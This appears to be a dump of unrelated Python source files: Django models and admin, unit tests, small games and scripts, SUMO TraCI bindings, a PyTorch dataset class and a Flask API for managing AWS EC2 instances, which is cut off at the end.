content
stringlengths 5
1.05M
|
|---|
import unittest
import json
import schemavalidation
class SchemaValidationTestCase(unittest.TestCase):
def test_event_schema_is_valid(self):
message = json.dumps({
'Timestamp': 1596717736,
'EventType': 'EVENT_TEST',
'ID': 'random-id',
'EmitterId': 'random-emitter-id',
'EmitterType': 'SYSTEM',
'Data': {
'field': 'value'
}
})
is_valid = schemavalidation.validate(message)
self.assertTrue(is_valid)
def test_event_schema_is_invalid(self):
# data field is missing
message = json.dumps({
'Timestamp': 1596717736,
'EventType': 'EVENT_TEST',
'ID': 'random-id',
'EmitterId': 'random-emitter-id',
})
is_valid = schemavalidation.validate(message)
self.assertFalse(is_valid)
def test_event_schema_is_valid_when_data_is_none(self):
message = json.dumps({
'Timestamp': 1596717736,
'EventType': 'EVENT_TEST',
'ID': 'random-id',
'EmitterId': 'random-emitter-id',
'EmitterType': 'SYSTEM',
'Data': None
})
is_valid = schemavalidation.validate(message)
self.assertTrue(is_valid)
if __name__ == '__main__':
unittest.main()
|
from django.contrib import admin
from .models import ProductImage, Product
from rest_framework.authtoken.admin import TokenAdmin
TokenAdmin.raw_id_fields = ('user',)
class ProductImageAdmin(admin.StackedInline):
model = ProductImage
#list_display = ('id', 'image')
def get_changeform_initial_data(self, request):
return { 'owner': request.user }
class ProductAdmin(admin.ModelAdmin):
model = Product
list_display = ['id', 'position', 'get_name_en', 'get_name_et',]
def get_changeform_initial_data(self, request):
return { 'owner': request.user }
def get_name_en(self, obj):
return obj.name_en
get_name_en.admin_order_field = 'position'
get_name_en.short_description = 'Name (en)'
def get_name_et(self, obj):
return obj.name_et
get_name_et.admin_order_field = 'position'
get_name_et.short_description = 'Name (et)'
inlines = [ProductImageAdmin]
# Register your models here.
# admin.site.register(ProductImage, ProductImageAdmin)
class MyAdminSite(admin.AdminSite):
# Disable View on Site link on admin page
site_header = "salmefelt"
site_url = None
admin_site = MyAdminSite(name='myadmin')
admin_site.register(Product, ProductAdmin)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Copyright (c) 2014 Loek Wensveen
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import
# system imports
from . import basetest
from settingslib.basesettings import BaseSettings, Section, Option, Resolver
import settingslib.configfile as configfile
class BaseSettingsTestCase(basetest.BaseTestCase):
def test_default(self):
class Settings(BaseSettings):
SOMETHING = 1
SOME = Option(1, 'int')
SOMETHING3 = Option("3", 'int')
SOMESTR = Option(1, Resolver('str'))
class SUBSECTION(Section):
SOM = 1
SOM3 = 1
settings = Settings()
self.assertEqual(settings.SOMETHING, 1)
self.assertEqual(settings.SOMETHING3, 3)
self.assertEqual(settings.SOME, 1)
self.assertEqual(settings.SOMESTR, "1")
self.assertEqual(settings.SUBSECTION.SOM, 1)
self.assertEqual(settings.SUBSECTION.SOM3, 1)
def test_options(self):
class Settings(BaseSettings):
SOMETHING = 1
SOMETHING3 = 3
SOME = Option(1, 'int')
SOMESTR = Option(1, Resolver('str', **{}))
class SUBSECTION(Section):
SOM = 1
SOM3 = 1
settings = Settings()
settings.set_options({"SOMETHING3": 4, "subsection.som3":3, "some" : 3})
self.assertEqual(settings.SOMETHING3, 4)
self.assertEqual(settings.SOME, 3)
self.assertEqual(settings.SUBSECTION.SOM3, 3)
self.assertEqual(settings.SUBSECTION.SOM, 1)
def test_userconfig(self):
class Settings(BaseSettings):
SOMETHING = 1
SOMETHING3 = 3
SOME = Option(1, 'int')
SOMESTR = Option(1, Resolver('str', **{}))
class SUBSECTION(Section):
SOM = 1
SOM3 = 1
settings = Settings()
config = configfile.ConfigFile()
config["some"] = "3"
settings.__dict__['userconfig'] = config
settings.SOMETHING = 4
settings.SUBSECTION.SOM = 5
self.assertEqual(settings.SOME, 3)
self.assertEqual(config["something"], "4")
self.assertEqual(settings.SOMETHING, 4)
self.assertEqual(config["subsection"]['som'], "5")
self.assertEqual(settings.SUBSECTION.SOM, 5)
def test_classoptions(self):
class Settings(BaseSettings):
class SOMETHING(Option):
"hello I am some help message"
default = 1
resolver = Resolver('int')
save = False
settings = Settings()
self.assertEqual(settings.SOMETHING, 1)
self.assertEqual(settings.help_dict['something'], "hello I am some help message")
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, dataset.shape[1]-1].values
#Fitting the Decision Tree Regression
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state = 0)
regressor.fit(X, y)
#Predicting a new result
y_pred = regressor.predict(np.reshape([6.5], (-1, 1)))
#Visualizing the results
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.scatter(6.5, y_pred, color = 'green')
plt.title('Salary vs Title')
plt.xlabel('Title')
plt.ylabel('Salary')
plt.show()
|
#!/usr/bin/env python
# Copyright (c) 2013-2017, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
SDK Gripper Example: keyboard
"""
import argparse
import rospy
import intera_interface
import intera_external_devices
from intera_interface import CHECK_VERSION
def map_keyboard(limb):
# initialize interfaces
print("Getting robot state...")
rs = intera_interface.RobotEnable(CHECK_VERSION)
init_state = rs.state()
try:
gripper = intera_interface.Gripper(limb)
except ValueError:
rospy.logerr("Could not detect a gripper attached to the robot.")
return
def clean_shutdown():
print("Exiting example.")
rospy.on_shutdown(clean_shutdown)
def offset_position(offset):
current = gripper.get_position()
gripper.set_position(current + offset)
def offset_holding(offset):
current = gripper.get_force()
gripper.set_holding_force(current + offset)
num_steps = 10.0
thirty_percent_velocity = 0.3*(gripper.MAX_VELOCITY - gripper.MIN_VELOCITY) + gripper.MIN_VELOCITY
bindings = {
# key: (function, args, description)
'r': (gripper.reboot, [], "reboot"),
'c': (gripper.calibrate, [], "calibrate"),
'q': (gripper.close, [], "close"),
'o': (gripper.open, [], "open"),
'+': (gripper.set_velocity, [gripper.MAX_VELOCITY], "set 100% velocity"),
'-': (gripper.set_velocity, [thirty_percent_velocity], "set 30% velocity"),
's': (gripper.stop, [], "stop"),
'h': (offset_holding, [-(gripper.MAX_FORCE / num_steps)], "decrease holding force"),
'j': (offset_holding, [gripper.MAX_FORCE / num_steps], "increase holding force"),
'u': (offset_position, [-(gripper.MAX_POSITION / num_steps)], "decrease position"),
'i': (offset_position, [gripper.MAX_POSITION / num_steps], "increase position"),
}
done = False
rospy.loginfo("Enabling robot...")
rs.enable()
print("Controlling grippers. Press ? for help, Esc to quit.")
while not done and not rospy.is_shutdown():
c = intera_external_devices.getch()
if c:
if c in ['\x1b', '\x03']:
done = True
elif c in bindings:
cmd = bindings[c]
cmd[0](*cmd[1])
print("command: %s" % (cmd[2],))
else:
print("key bindings: ")
print(" Esc: Quit")
print(" ?: Help")
for key, val in sorted(bindings.items(),
key=lambda x: x[1][2]):
print(" %s: %s" % (key, val[2]))
# force shutdown call if caught by key handler
rospy.signal_shutdown("Example finished.")
def main():
"""RSDK Gripper Example: Keyboard Control
Use your dev machine's keyboard to control and configure grippers.
Run this example to command various gripper movements while
adjusting gripper parameters, including calibration, velocity,
and force. Uses the intera_interface.Gripper class and the
helper function, intera_external_devices.getch.
"""
epilog = """
See help inside the example with the '?' key for key bindings.
"""
rp = intera_interface.RobotParams()
valid_limbs = rp.get_limb_names()
if not valid_limbs:
rp.log_message(("Cannot detect any limb parameters on this robot. "
"Exiting."), "ERROR")
return
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__,
epilog=epilog)
parser.add_argument(
"-l", "--limb", dest="limb", default=valid_limbs[0],
choices=valid_limbs,
help="Limb on which to run the gripper keyboard example"
)
args = parser.parse_args(rospy.myargv()[1:])
print("Initializing node... ")
rospy.init_node("sdk_gripper_keyboard")
map_keyboard(args.limb)
if __name__ == '__main__':
main()
|
"""
IIPP Mini-Project 2: Guess the Number
Author: Weikang Sun
Date: 6/9/15
codeskulptor source:
http://www.codeskulptor.org/#user40_9uCFBsoLw2_2.py
"""
# template for "Guess the number" mini-project
# input will come from buttons and an input field
# all output for the game will be printed in the console
import simplegui
import random
import math
secret_number = 0
max_range = 100
remaining_guesses = 0
def new_game():
"""
Begins a new game with the specified max_range
"""
global secret_number
compute_max_guesses()
secret_number = random.randrange(0, max_range)
print "New Game: Range [0,", str(max_range) + ")"
print_guesses()
def compute_max_guesses():
"""
helper function to compute the maximum guesses based
on the binary search algorithm
"""
global remaining_guesses
# max guesses is simply the next highest integer
# for the log base two of the max_range
remaining_guesses = int(math.ceil(math.log(max_range, 2)))
def print_guesses():
"""
simple method to print the remaining guesses
and check if game over with no guesses left
"""
if remaining_guesses == 0:
print "You ran out of guesses!"
print "Secret number was:", secret_number
print
new_game()
else:
print "Remaining Guesses:", remaining_guesses
print
def range100():
"""
button that changes the range to [0,100) and starts a new game
"""
global max_range
max_range = 100
new_game()
def range1000():
"""
button that changes the range to [0,1000) and starts a new game
"""
global max_range
max_range = 1000
new_game()
def input_guess(input_str):
"""
main game logic goes here when an input is entered
"""
global remaining_guesses
try:
guess = int(input_str)
print "Guess was", int(guess)
remaining_guesses -= 1
if guess < secret_number:
print "Go higher!"
print_guesses()
elif guess > secret_number:
print "Go lower!"
print_guesses()
else:
print "Correct!"
print
new_game()
except:
print "Enter a valid guess (integer)"
print
# create frame
frame = simplegui.create_frame("Guess the Number!", 100, 300)
# register event handlers for control elements and start frame
game100 = frame.add_button("Range: [0, 100)", range100, 150)
game1000 = frame.add_button("Range: [0, 1000)", range1000, 150)
guess = frame.add_input("Guess:", input_guess, 100)
frame.start()
# call new_game
new_game()
|
class MockECR(object):
@property
def aws_account_id(self):
return '12345678'
@property
def registry(self):
return []
@property
def project_repo(self):
return 'nginxdemos'
def project_repo_exists(self):
return True
def create_project_repo(self):
return True
def get_login(self):
return ''
def get_image_by_tag(self, tag):
return 'latest'
@property
def images(self):
return []
def tag_exists(self, tag):
return True
def find_git_sha1_image_tag(self, tag):
return 'latest'
def retag(self, tag, new_tag):
pass
|
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
@login_required(login_url='/login/')
def add_bundle_page_view(request):
"""
This view Renders Create Bundle Page
"""
if not request.user.is_viewer :
context = {
"title": "Create Bundle"
}
return render(request, 'add_bundle.html',context)
else:
return redirect('/dashboard/')
|
import os
import time
from django.conf import settings
from django.db import models
from django.utils.text import slugify
from django.utils.translation import gettext_lazy as _
from rest_framework.reverse import reverse
from osmaxx.conversion import coordinate_reference_system as crs, output_format, status
from osmaxx.clipping_area.models import ClippingArea
from osmaxx.conversion.converters.converter import convert
from osmaxx.conversion.converters.converter_gis.detail_levels import DETAIL_LEVEL_CHOICES, DETAIL_LEVEL_ALL
def job_directory_path(instance, filename):
return 'job_result_files/{0}/{1}'.format(instance.id, filename)
class Parametrization(models.Model):
out_format = models.CharField(verbose_name=_("out format"), choices=output_format.CHOICES, max_length=100)
out_srs = models.IntegerField(
verbose_name=_("output SRS"), help_text=_("EPSG code of the output spatial reference system"),
null=True, blank=True, default=4326, choices=crs.CHOICES
)
clipping_area = models.ForeignKey(ClippingArea, verbose_name=_('Clipping Area'), on_delete=models.CASCADE)
detail_level = models.IntegerField(verbose_name=_('detail level'), choices=DETAIL_LEVEL_CHOICES, default=DETAIL_LEVEL_ALL)
def __str__(self):
return _("{}: {} as EPSG:{}").format(self.id, self.get_out_format_display(), self.out_srs)
@property
def epsg(self):
return "EPSG:{}".format(self.out_srs)
class Job(models.Model):
callback_url = models.URLField(_('callback url'), max_length=250)
parametrization = models.ForeignKey(verbose_name=_('parametrization'), to=Parametrization, on_delete=models.CASCADE)
rq_job_id = models.CharField(_('rq job id'), max_length=250, null=True)
status = models.CharField(_('job status'), choices=status.CHOICES, default=status.RECEIVED, max_length=20)
resulting_file = models.FileField(_('resulting file'), upload_to=job_directory_path, null=True, max_length=250)
estimated_pbf_size = models.FloatField(_('estimated pbf size in bytes'), null=True)
unzipped_result_size = models.FloatField(
_('file size in bytes'), null=True, help_text=_("without the static files, only the conversion result")
)
extraction_duration = models.DurationField(
_('extraction duration'), help_text=_('time needed to generate the extraction'), null=True
)
own_base_url = models.CharField(
_('own base url'), help_text=_('the url from which this job is reachable'), max_length=250
)
queue_name = models.CharField(
_('queue name'), help_text=_('queue name for processing'), default='default',
max_length=50, choices=[(key, key) for key in settings.RQ_QUEUE_NAMES]
)
def start_conversion(self, *, use_worker=True):
self.rq_job_id = convert(
conversion_format=self.parametrization.out_format,
area_name=self.parametrization.clipping_area.name,
osmosis_polygon_file_string=self.parametrization.clipping_area.osmosis_polygon_file_string,
output_zip_file_path=self._out_zip_path(),
filename_prefix=self._filename_prefix(),
detail_level=self.parametrization.detail_level,
out_srs=self.parametrization.epsg,
use_worker=use_worker,
queue_name=self.queue_name,
)
self.save()
def zip_file_relative_path(self):
return job_directory_path(self, '{}.{}'.format(self._filename_prefix(), 'zip'))
def get_absolute_url(self):
base_uri = self.own_base_url
if base_uri.endswith('/'):
base_uri = base_uri[:-1]
return base_uri + reverse('conversion_job-detail', kwargs={'pk': self.id})
def _out_zip_path(self):
# assure path exists
complete_zip_file_path = os.path.join(
settings.MEDIA_ROOT, self.zip_file_relative_path()
)
os.makedirs(os.path.dirname(complete_zip_file_path), exist_ok=True)
return complete_zip_file_path
@property
def get_absolute_file_path(self):
if self.has_file:
return self.resulting_file.path
return None
def _filename_prefix(self):
return '{basename}_{srs}_{date}_{out_format}_{detail_level}'.format(
basename=slugify(self.parametrization.clipping_area.name),
srs=slugify(self.parametrization.get_out_srs_display()),
date=time.strftime("%Y-%m-%d"),
out_format=self.parametrization.out_format,
detail_level=slugify(self.parametrization.get_detail_level_display()),
)
@property
def has_file(self):
return bool(self.resulting_file)
def delete(self, *args, **kwargs):
if self.has_file:
os.unlink(self.resulting_file.path)
return super().delete(args, kwargs)
def __str__(self):
return _("job {} with rq_id {} ({})").format(self.id, self.rq_job_id, self.parametrization.clipping_area.name)
|
A, B = map(int, input().split())
result = []
if A >= B:
result.extend(range(1, A + 1))
result.extend(-x for x in range(1, B))
result.append(-sum(result))
else:
result.extend(-x for x in range(1, B + 1))
result.extend(range(1, A))
result.append(-sum(result))
print(*result)
|
def minion_game(s):
vowels = 'AEIOU'
k_score = 0
s_score = 0
for i in range(len(s)):
if s[i] in vowels:
k_score += (len(s)-i)
else:
s_score += (len(s)-i)
if k_score > s_score:
print ("Kevin", k_score)
elif k_score < s_score:
print ("Stuart", s_score)
else:
print ("Draw")
|
from django.apps import AppConfig
class NewscategoryConfig(AppConfig):
name = 'newsCategory'
|
from django.db import models
from rest_framework import serializers
class sponsors(models.Model):
name = models.CharField(max_length= 150, null= True, blank= True)
sponsor_type = models.CharField(max_length= 150, null= True, blank= True)
website = models.CharField(max_length= 150, null= True, blank= True)
phone_number = models.IntegerField(null= True, blank= True)
logo = models.FileField(null= True, blank= True,upload_to='sponsors/')
class robothonAbstract(models.Model):
title = models.CharField(max_length= 150, null= True, blank= True)
xfile = models.FileField(null= True, blank= True,upload_to='robothonAbstract/')
class roboExpoAbstract(models.Model):
title = models.CharField(max_length= 150, null= True, blank= True)
xfile = models.FileField(null= True, blank= True,upload_to='robothonExpoAbstract/')
class SponsorSerializer(serializers.ModelSerializer):
class Meta:
model = sponsors
fields = '__all__'
class RobothonSerializer(serializers.ModelSerializer):
class Meta:
model = robothonAbstract
fields = '__all__'
class RoboExpoSerializer(serializers.ModelSerializer):
class Meta:
model = roboExpoAbstract
fields = '__all__'
|
# -*- coding: utf-8 -*-
"""
@file inductionloop.py
@author Michael Behrisch
@author Daniel Krajzewicz
@date 2011-03-16
@version $Id: inductionloop.py 15031 2013-11-05 19:52:41Z behrisch $
Python implementation of the TraCI interface.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2011-2013 DLR (http://www.dlr.de/) and contributors
This file is part of SUMO.
SUMO is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
"""
import traci
import traci.constants as tc
def readVehicleData(result):
result.readLength()
nbData = result.readInt()
data = []
for i in range(nbData):
result.read("!B")
vehID = result.readString()
result.read("!B")
length = result.readDouble()
result.read("!B")
entryTime = result.readDouble()
result.read("!B")
leaveTime = result.readDouble()
result.read("!B")
typeID = result.readString()
data.append( [ vehID, length, entryTime, leaveTime, typeID ] )
return data
_RETURN_VALUE_FUNC = {tc.ID_LIST: traci.Storage.readStringList,
tc.ID_COUNT: traci.Storage.readInt,
tc.VAR_POSITION: traci.Storage.readDouble,
tc.VAR_LANE_ID: traci.Storage.readString,
tc.LAST_STEP_VEHICLE_NUMBER: traci.Storage.readInt,
tc.LAST_STEP_MEAN_SPEED: traci.Storage.readDouble,
tc.LAST_STEP_VEHICLE_ID_LIST: traci.Storage.readStringList,
tc.LAST_STEP_OCCUPANCY: traci.Storage.readDouble,
tc.LAST_STEP_LENGTH: traci.Storage.readDouble,
tc.LAST_STEP_TIME_SINCE_DETECTION: traci.Storage.readDouble,
tc.LAST_STEP_VEHICLE_DATA: readVehicleData}
subscriptionResults = traci.SubscriptionResults(_RETURN_VALUE_FUNC)
def _getUniversal(varID, loopID):
result = traci._sendReadOneStringCmd(tc.CMD_GET_INDUCTIONLOOP_VARIABLE, varID, loopID)
return _RETURN_VALUE_FUNC[varID](result)
def getIDList():
"""getIDList() -> list(string)
Returns a list of all induction loops in the network.
"""
return _getUniversal(tc.ID_LIST, "")
def getIDCount():
"""getIDCount() -> integer
Returns the number of induction loops in the network.
"""
return _getUniversal(tc.ID_COUNT, "")
def getPosition(loopID):
"""getPosition(string) -> double
Returns the position measured from the beginning of the lane in meters.
"""
return _getUniversal(tc.VAR_POSITION, loopID)
def getLaneID(loopID):
"""getLaneID(string) -> string
Returns the id of the lane the loop is on.
"""
return _getUniversal(tc.VAR_LANE_ID, loopID)
def getLastStepVehicleNumber(loopID):
"""getLastStepVehicleNumber(string) -> integer
Returns the number of vehicles that were on the named induction loop within the last simulation step.
"""
return _getUniversal(tc.LAST_STEP_VEHICLE_NUMBER, loopID)
def getLastStepMeanSpeed(loopID):
"""getLastStepMeanSpeed(string) -> double
Returns the mean speed in m/s of vehicles that were on the named induction loop within the last simulation step.
"""
return _getUniversal(tc.LAST_STEP_MEAN_SPEED, loopID)
def getLastStepVehicleIDs(loopID):
"""getLastStepVehicleIDs(string) -> list(string)
Returns the list of ids of vehicles that were on the named induction loop in the last simulation step.
"""
return _getUniversal(tc.LAST_STEP_VEHICLE_ID_LIST, loopID)
def getLastStepOccupancy(loopID):
"""getLastStepOccupancy(string) -> double
Returns the percentage of time the detector was occupied by a vehicle.
"""
return _getUniversal(tc.LAST_STEP_OCCUPANCY, loopID)
def getLastStepMeanLength(loopID):
"""getLastStepMeanLength(string) -> double
Returns the mean length in m of vehicles which were on the detector in the last step.
"""
return _getUniversal(tc.LAST_STEP_LENGTH, loopID)
def getTimeSinceDetection(loopID):
"""getTimeSinceDetection(string) -> double
Returns the time in s since last detection.
"""
return _getUniversal(tc.LAST_STEP_TIME_SINCE_DETECTION, loopID)
def getVehicleData(loopID):
"""getVehicleData(string) -> integer
Returns a complex structure containing several information about vehicles which passed the detector.
"""
return _getUniversal(tc.LAST_STEP_VEHICLE_DATA, loopID)
def subscribe(loopID, varIDs=(tc.LAST_STEP_VEHICLE_NUMBER,), begin=0, end=2**31-1):
"""subscribe(string, list(integer), double, double) -> None
Subscribe to one or more induction loop values for the given interval.
"""
traci._subscribe(tc.CMD_SUBSCRIBE_INDUCTIONLOOP_VARIABLE, begin, end, loopID, varIDs)
def getSubscriptionResults(loopID=None):
"""getSubscriptionResults(string) -> dict(integer: <value_type>)
Returns the subscription results for the last time step and the given loop.
If no loop id is given, all subscription results are returned in a dict.
If the loop id is unknown or the subscription did for any reason return no data,
'None' is returned.
It is not possible to retrieve older subscription results than the ones
from the last time step.
"""
return subscriptionResults.get(loopID)
def subscribeContext(loopID, domain, dist, varIDs=(tc.LAST_STEP_VEHICLE_NUMBER,), begin=0, end=2**31-1):
traci._subscribeContext(tc.CMD_SUBSCRIBE_INDUCTIONLOOP_CONTEXT, begin, end, loopID, domain, dist, varIDs)
def getContextSubscriptionResults(loopID=None):
return subscriptionResults.getContext(loopID)
|
# coding: utf-8
"""
Uptrends API v4
This document describes Uptrends API version 4. This Swagger environment also lets you execute API methods directly. Please note that this is not a sandbox environment: these API methods operate directly on your actual Uptrends account. For more information, please visit https://www.uptrends.com/api. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import uptrends
from uptrends.api.sla_api import SLAApi # noqa: E501
from uptrends.rest import ApiException
class TestSLAApi(unittest.TestCase):
"""SLAApi unit test stubs"""
def setUp(self):
self.api = uptrends.api.sla_api.SLAApi() # noqa: E501
def tearDown(self):
pass
def test_sla_create_sla(self):
"""Test case for sla_create_sla
Creates a new SLA. # noqa: E501
"""
pass
def test_sla_delete_exclusion_period(self):
"""Test case for sla_delete_exclusion_period
Deletes the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_delete_sla(self):
"""Test case for sla_delete_sla
Deletes the specified SLA. # noqa: E501
"""
pass
def test_sla_get_exclusion_period(self):
"""Test case for sla_get_exclusion_period
Gets the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_get_exclusion_periods(self):
"""Test case for sla_get_exclusion_periods
Gets a list of all exclusion periods for the specified SLA. # noqa: E501
"""
pass
def test_sla_get_sla(self):
"""Test case for sla_get_sla
Gets the specified SLA definition. # noqa: E501
"""
pass
def test_sla_get_slas(self):
"""Test case for sla_get_slas
Gets a list of all SLA definitions. # noqa: E501
"""
pass
def test_sla_patch_exclusion_period(self):
"""Test case for sla_patch_exclusion_period
Partially updates the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_patch_sla(self):
"""Test case for sla_patch_sla
Partially updates the definition of the specified SLA. # noqa: E501
"""
pass
def test_sla_post_exclusion_period(self):
"""Test case for sla_post_exclusion_period
Creates a new exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_put_exclusion_period(self):
"""Test case for sla_put_exclusion_period
Updates the specified exclusion period for the specified SLA. # noqa: E501
"""
pass
def test_sla_put_sla(self):
"""Test case for sla_put_sla
Updates the definition of the specified SLA. # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
import json
from pathlib import Path
from typing import List, Union
from PIL import Image
from torchvision import transforms
from torch.utils.data import Dataset
NORMALIZE_DEFAULT = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
class EasySet(Dataset):
"""
A ready-to-use dataset. Will work for any dataset where the images are
grouped in directories by class. It expects a JSON file defining the
classes and where to find them. It must have the following shape:
{
"class_names": [
"class_1",
"class_2"
],
"class_roots": [
"path/to/class_1_folder",
"path/to/class_2_folder"
]
}
"""
def __init__(self, specs_file: Union[Path, str], image_size=224, training=False):
"""
Args:
specs_file: path to the JSON file
image_size: images returned by the dataset will be square images of the given size
training: preprocessing is slightly different for a training set, adding a random
cropping and a random horizontal flip.
"""
specs = self.load_specs(Path(specs_file))
self.images, self.labels = self.list_data_instances(specs["class_roots"])
self.class_names = specs["class_names"]
self.transform = self.compose_transforms(image_size, training)
@staticmethod
def load_specs(specs_file: Path) -> dict:
"""
Load specs from a JSON file.
Args:
specs_file: path to the JSON file
Returns:
dictionary contained in the JSON file
Raises:
ValueError: if specs_file is not a JSON, or if it is a JSON and the content is not
of the expected shape.
"""
if specs_file.suffix != ".json":
raise ValueError("EasySet requires specs in a JSON file.")
with open(specs_file, "r") as file:
specs = json.load(file)
if "class_names" not in specs.keys() or "class_roots" not in specs.keys():
raise ValueError(
"EasySet requires specs in a JSON file with the keys class_names and class_roots."
)
if len(specs["class_names"]) != len(specs["class_roots"]):
raise ValueError(
"Number of class names does not match the number of class root directories."
)
return specs
@staticmethod
def compose_transforms(image_size: int, training: bool) -> transforms.Compose:
"""
Create a composition of torchvision transformations, with some randomization if we are
building a training set.
Args:
image_size: size of dataset images
training: whether this is a training set or not
Returns:
compositions of torchvision transformations
"""
return (
transforms.Compose(
[
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(**NORMALIZE_DEFAULT),
]
)
if training
else transforms.Compose(
[
transforms.Resize([int(image_size * 1.15), int(image_size * 1.15)]),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Normalize(**NORMALIZE_DEFAULT),
]
)
)
@staticmethod
def list_data_instances(class_roots: List[str]) -> (List[str], List[int]):
"""
Explore the directories specified in class_roots to find all data instances.
Args:
class_roots: each element is the path to the directory containing the elements
of one class
Returns:
list of paths to the images, and a list of same length containing the integer label
of each image
"""
images = []
labels = []
for class_id, class_root in enumerate(class_roots):
class_images = [
str(image_path)
for image_path in sorted(Path(class_root).glob("*"))
if image_path.is_file()
]
images += class_images
labels += len(class_images) * [class_id]
return images, labels
def __getitem__(self, item: int):
"""
Get a data sample from its integer id.
Args:
item: sample's integer id
Returns:
data sample in the form of a tuple (image, label), where label is an integer.
The type of the image object depends of the output type of self.transform. By default
it's a torch.Tensor, however you are free to define any function as self.transform, and
therefore any type for the output image. For instance, if self.transform = lambda x: x,
then the output image will be of type PIL.Image.Image.
"""
# Some images of ILSVRC2015 are grayscale, so we convert everything to RGB for consistence.
# If you want to work on grayscale images, use torch.transforms.Grayscale in your
# transformation pipeline.
img = self.transform(Image.open(self.images[item]).convert("RGB"))
label = self.labels[item]
return img, label
def __len__(self) -> int:
return len(self.labels)
def number_of_classes(self):
return len(self.class_names)
|
from flask import Flask, request, jsonify
from config import config
import logging
import boto3
app = Flask(__name__)
logging.basicConfig(
filename=config['log_file'],
level=config['log_level']
)
def get_aws_client(request):
aws_access_key_id = request.args.get("aws_access_key_id")
aws_secret_access_key = request.args.get("aws_secret_access_key")
region_name = request.args.get("region_name")
return boto3.client('ec2',
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
region_name=region_name
)
# Endpoint: http://<api_host>:<api_port>/ec2/list
@app.route('/ec2/list', methods=['GET'])
def aws_list():
try:
client = get_aws_client(request)
instances = client.describe_instances()
output = []
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
output.append(
{
'id': instance['InstanceId'],
"instance-type": instance['InstanceType'],
"instance-state": instance['State']['Name'],
"private-ip": instance['PrivateIpAddress'],
"key-name": instance['KeyName'],
"image-id": instance['ImageId'],
"vpc-id": instance['VpcId'],
"subnet-id": instance['SubnetId'],
"security-group-ids": instance['SecurityGroups'],
}
)
print(output)
return jsonify(output), 200
except Exception as error:
print(str(error))
return jsonify({'Message': "Unexpected Error occured", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/start
@app.route("/ec2/start", methods=["POST"])
def start_ec2_instances():
try:
client = get_aws_client(request)
InstanceId = request.args.get("InstanceId")
response = client.start_instances(
InstanceIds=[InstanceId]
)
return jsonify(response["StartingInstances"][0]), 200
except Exception as error:
print(str(error))
return jsonify({'Message': "Unexpected Error occured", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/stop
@app.route("/ec2/stop", methods=["POST"])
def stop_ec2_instances():
try:
client = get_aws_client(request)
InstanceId = request.args.get("InstanceId")
response = client.stop_instances(
InstanceIds=[InstanceId]
)
return jsonify(response["StoppingInstances"][0]), 200
except Exception as error:
print(str(error))
return jsonify({'Message': "Unexpected Error occured", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/create
@app.route("/ec2/create", methods=["POST"])
def create_ec2_instance():
try:
client = get_aws_client(request)
KeyName = request.args.get("KeyName")
SecurityGroupIds = request.args.get("SecurityGroupId")
response = client.run_instances(
ImageId='ami-0fb653ca2d3203ac1', # Ubuntu Server 20.04, 64-bit x86
InstanceType='t2.micro', # 1 vCPU, 1 GB RAM (Free tier ^^)
MinCount=1,
MaxCount=1,
KeyName=KeyName,
SecurityGroupIds=[SecurityGroupIds]
)
print(response)
return jsonify(response["Instances"][0]), 200
except Exception as error:
print(str(error))
return jsonify({'Message': "Unexpected Error occured", 'Error': str(error)}), 500
# Endpoint: http://<api_host>:<api_port>/ec2/terminate
